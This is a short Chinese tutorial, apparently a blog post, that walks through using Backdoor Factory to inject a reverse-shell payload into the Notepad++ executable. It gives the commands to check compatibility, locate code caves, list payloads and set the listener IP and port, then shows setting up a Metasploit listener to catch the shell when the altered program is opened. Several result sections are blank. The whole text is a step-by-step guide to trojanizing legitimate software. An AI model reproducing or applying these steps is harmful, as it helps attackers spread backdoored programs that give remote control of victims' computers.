0x00 下载Backdoor Factory:

https://github.com/secretsquirrel/the-backdoor-factory

0x01 检测软件是否能做后门:

1

python backdoor.py -f ../Notepad++.exe -S

检测结果:

0x02 检测软件是否有空挡位置插入后门

1

python backdoor.py -f ../Notepad++.exe -c -l 750

参数解释:

运行检测命令:

运行结果发现, 有21处可以插入后门:

0x03查看可用Payload:

1

python backdoor.py -f ../Notepad++.exe -show

-show 参数作用是显示可用payload:

显示可用Payload结果:

0x04选择模块

-s+模块名称

-H+监听机IP

-P+监听机端口

0x05 选择要插入的地方

这里可以随便选择一个地方

制作完成!

0x06 MSF监听

这里因为我的Kali 的VMtools安装不了, 所以这里用了nc 的方法传文件到我的主机

再把接受到的文件放进到文件夹里面运行

这里可以根据情况替换掉(这里为了演示我就不替换掉了)

0x07 启动MSF设置监听

• set LHOST 监听IP (和制作后门时的一样)
• set LPORT 监听端口 (和制作后门时的一样)

• run (运行设置好的模块,开始监听)

• 运行带后门的软件 (打开软件就可以连接上了)

  

• 选用shell模块

成功反弹shell